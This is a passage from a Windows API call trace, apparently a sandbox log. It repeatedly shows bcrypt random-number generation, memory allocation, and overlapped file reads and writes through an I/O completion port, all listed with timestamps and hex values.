(_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.908] free (_Block=0x1fa91d0) [0180.908] free (_Block=0x1fa2ed8) [0180.908] free (_Block=0x1fa90b8) [0180.908] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.922] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.922] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.922] free (_Block=0x3e305b8) [0180.922] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.922] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.922] free (_Block=0x1fa91d0) [0180.922] free (_Block=0x1fa2ed8) [0180.922] free (_Block=0x1fa90b8) [0180.922] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.932] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.932] free (_Block=0x3e305b8) [0180.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.932] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.932] free (_Block=0x1fa91d0) [0180.933] free (_Block=0x1fa2ed8) [0180.933] free (_Block=0x1fa90b8) [0180.933] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.952] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.952] free (_Block=0x3e305b8) [0180.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.952] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.952] free (_Block=0x1fa91d0) [0180.952] free (_Block=0x1fa2ed8) [0180.952] free (_Block=0x1fa90b8) [0180.952] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.965] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.965] free (_Block=0x3e305b8) [0180.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.966] free (_Block=0x1fa91d0) [0180.966] free (_Block=0x1fa2ed8) [0180.966] free (_Block=0x1fa90b8) [0180.966] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.999] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.999] free (_Block=0x3e305b8) [0180.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.999] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.000] free (_Block=0x1fa91d0) [0181.000] free (_Block=0x1fa2ed8) [0181.000] free (_Block=0x1fa90b8) [0181.000] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0181.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0181.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0181.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0181.125] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.125] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.125] free (_Block=0x3e305b8) [0181.125] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.125] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.125] free (_Block=0x1fa91d0) [0181.125] free (_Block=0x1fa2ed8) [0181.125] free (_Block=0x1fa90b8) [0181.125] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0181.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.485] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0182.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.489] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x12d1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0182.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.625] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.626] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.626] free (_Block=0x3e305b8) [0182.626] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.626] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.626] free (_Block=0x1fa91d0) [0182.626] free (_Block=0x1fa2ed8) [0182.626] free (_Block=0x1fa90b8) [0182.626] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.630] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.641] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.641] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.641] free (_Block=0x3e305b8) [0182.641] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.641] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.641] free (_Block=0x1fa91d0) [0182.641] free (_Block=0x1fa2ed8) [0182.641] free (_Block=0x1fa90b8) [0182.641] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.653] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.653] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.653] free (_Block=0x3e305b8) [0182.653] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.653] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.654] free (_Block=0x1fa91d0) [0182.654] free (_Block=0x1fa2ed8) [0182.654] free (_Block=0x1fa90b8) [0182.654] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.661] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.661] free (_Block=0x3e305b8) [0182.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.662] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.662] free (_Block=0x1fa91d0) [0182.662] free (_Block=0x1fa2ed8) [0182.662] free (_Block=0x1fa90b8) [0182.662] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.675] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.675] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.675] free (_Block=0x3e305b8) [0182.676] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.676] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.676] free (_Block=0x1fa91d0) [0182.676] free (_Block=0x1fa2ed8) [0182.676] free (_Block=0x1fa90b8) [0182.676] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.681] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.681] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.681] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.681] free (_Block=0x3e305b8) [0182.681] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.682] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.682] free (_Block=0x1fa91d0) [0182.682] free (_Block=0x1fa2ed8) [0182.682] free (_Block=0x1fa90b8) [0182.682] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.685] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.696] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.696] free (_Block=0x3e305b8) [0182.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.696] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.696] free (_Block=0x1fa91d0) [0182.696] free (_Block=0x1fa2ed8) [0182.697] free (_Block=0x1fa90b8) [0182.697] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.713] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.725] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.725] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.725] free (_Block=0x3e305b8) [0182.726] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.726] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.726] free (_Block=0x1fa91d0) [0182.726] free (_Block=0x1fa2ed8) [0182.726] free (_Block=0x1fa90b8) [0182.726] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.727] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0182.732] 